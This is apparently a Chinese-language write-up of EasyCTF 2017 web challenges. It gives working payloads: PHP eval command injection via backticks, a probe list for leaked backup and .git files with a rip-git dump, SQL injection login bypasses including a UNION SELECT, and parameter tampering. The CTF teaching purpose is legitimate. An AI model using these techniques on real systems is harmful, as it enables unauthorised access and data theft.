EasyCTF 2017 Web Write Up

作者:Jing Ling
博客:HackFun

0x05 Web

problem

I found the cookie monster’s blog!

solution

TinyEval

problem

This page will evaluate anything you give it.

solution

首先想到可能是php的eval()函数,于是随手输入echo("hello world"),提示字符太长,最后经过测试最多能输入11个字符。
这里用到一个php的技巧

[email protected]:~# cat 1.php 
<?php
eval("echo`ls`;");
?>
[email protected]:~# php 1.php 
1.php
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos

于是输入echols:

看到了flag文件了,但是文件名很长,除了echo``,就只能再输入5个字符,所以要找到一个巧妙的方法,多次尝试找到方法:

echo`cat *`

刚好11个字符,获得flag:

Edge 1

problem

We found Edge inc’s website! Take a look at it here.

solution

官方提醒说不能使用扫描器,要不然会被BAN,但是搞了一通之后没有什么收获,提醒说不能使用扫描器于是猜测是不是跟源码泄露有关,就手动测试一下:

index.php~
index.php.vim
index.php.swp
index.php.swn
index.php.swo
index.php.old
index.php.txt
index.php.bak
index.php.zip
index.php.rar
/.svn
/.git

测试到/.git终于出现惊喜:

rip-git

[email protected]:~# rip-git -v -u http://edge1.web.easyctf.com/.git/
[email protected]:~/.git# git log
commit ee9061b25d8a35bae8380339f187b44dc26f4999
Author: Michael <[email protected]>
Date:   Mon Mar 13 07:11:47 2017 +0000

    Whoops! Remove flag.

commit afdf86202dc8a3c3d671f2106d5cffa593f2b320
Author: Michael <[email protected]>
Date:   Mon Mar 13 07:11:45 2017 +0000

    Initial.

commit 15ca375e54f056a576905b41a417b413c57df6eb
Author: Fernando <[email protected]>
Date:   Sat Dec 14 12:50:09 2013 -0300

    initial version

commit 8ac4f76df2ce8db696d75f5f146f4047a315af22
Author: Fernando Mayo <[email protected]>
Date:   Sat Dec 14 07:36:18 2013 -0800

    Initial commit

回滚到删掉flag之前:

[email protected]:~/.git# git reset –hard afdf86202dc8a3c3d671f2106d5cffa593f2b320

根目录出现了flag.txt:

[email protected]:~/.git# cat flag.txt
easyctf{w3_ev3n_u53_git}

推荐文章:关于WEB敏感文件探测的一点思考

Edge 2

problem

Last time we screwed up. But we’ve learned our lesson.

solution

再次访问/.git,结果:

虽然被禁止列目录,但是那些文件依然存在,再次尝试使用rip-git,结果还是下载下来了,接下来就跟Edge 1一样的做法了:

[email protected]:~# rip-git -v -u http://edge2.web.easyctf.com/.git/
[email protected]:~/.git# git log
commit a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd
Author: Michael <[email protected]>
Date:   Mon Mar 13 07:32:12 2017 +0000

    Prevent directory listing.

commit 6b4131bb3b84e9446218359414d636bda782d097
Author: Michael <[email protected]>
Date:   Mon Mar 13 07:32:10 2017 +0000

    Whoops! Remove flag.

commit 26e35470d38c4d6815bc4426a862d5399f04865c
Author: Michael <[email protected]>
Date:   Mon Mar 13 07:32:09 2017 +0000

    Initial.

commit 15ca375e54f056a576905b41a417b413c57df6eb
Author: Fernando <[email protected]>
Date:   Sat Dec 14 12:50:09 2013 -0300

    initial version

同样回到删掉flag之前:

[email protected]:~/.git# git reset –hard 26e35470d38c4d6815bc4426a862d5399f04865c
[email protected]:~/.git# cat flag.txt
easyctf{hiding_the_problem_doesn't_mean_it's_gone!}

SQL Injection 1

problem

I need help logging into this website to get my flag! If it helps, my username is admin.
Running sqlmap or the likes will earn you an IP ban.

hint: What does “injection” mean? How can you “inject” code into your username to control the username lookup?

solution

查看网页源代码,估计SQL语句是这样的:

select * from users where username="admin" and password=""

于是任意构造:

" or "1"="1

select * from users where username="admin" and password="" or "1"="1"

flag:easyctf{a_prepared_statement_a_day_keeps_the_d0ctor_away!}

SQL Injection 2

problem

I’ve told my friend a billion times that the user called leet1337 doesn’t exist on this website, but he won’t listen. Could you please login as this user, even though it doesn’t exist in the database? Oh and also, make sure that the user has a power level over 9000!!!!
Running sqlmap or the likes will earn you an IP ban.

hint: The columns in the table are (not in order) username, password, power_level, and a unique id.

solution

根据提示估计SQL语句是这样的:

select username, password, power_level, id from table where username="" and password=""

多次尝试使用union查询,#号截断:

" union select "leet1337", "leet1337", "leet1337", "9999"#

select username, password, power_level, id from table where username="" and password="" union select "leet1337", "leet1337", "leet1337", "9999"#"

Blogbox

problem

I found another blog! Do you think you can find a flag on it?

Hint: Use the search bar to see all the public posts! (And only the public posts!)

solution


根据提示进行搜索,但是不论输入什么都得不到想要得结果,搜索时GET请求类似这样:

http://blogbox.web.easyctf.com/search?query=flag

后来看提示我们只能看到公开的(public)文章,于是想到搜索有可能还可以传入public这个参数:
最终:http://blogbox.web.easyctf.com/search?query=ctf&public=0

Web tunnel

problem

I was just going to search some random cat videos on a Saturday morning when my friend came up to me and told me to reach the end of this tunnel. Can you do it for me?

Hint: You should write a script for this. The tunnel goes on too deep for any normal human.

solution

打开网站,得到一张二维码,扫描之后得到的字符串又做为下一个二维码图片的路径,就这样循环,那么上脚本:

import requests

QR_api = 'https://api.qrserver.com/v1/read-qr-code/'
QR_name ='DaicO7460493nYSuvLPW'

while True:
    if 'easyctf' not in QR_name:
        QR_url = 'http://tunnel.web.easyctf.com/images/' + QR_name + '.png'
        r = requests.get(url = QR_api, params = {'fileurl' : QR_url})
        QR_name = r.json()[0]["symbol"][0]["data"]
    else:
        break
print(QR_name) # easyctf{y0u_sh0uld_b3_t1r3d_tr4v3ll1ng_all_th1s_w4y}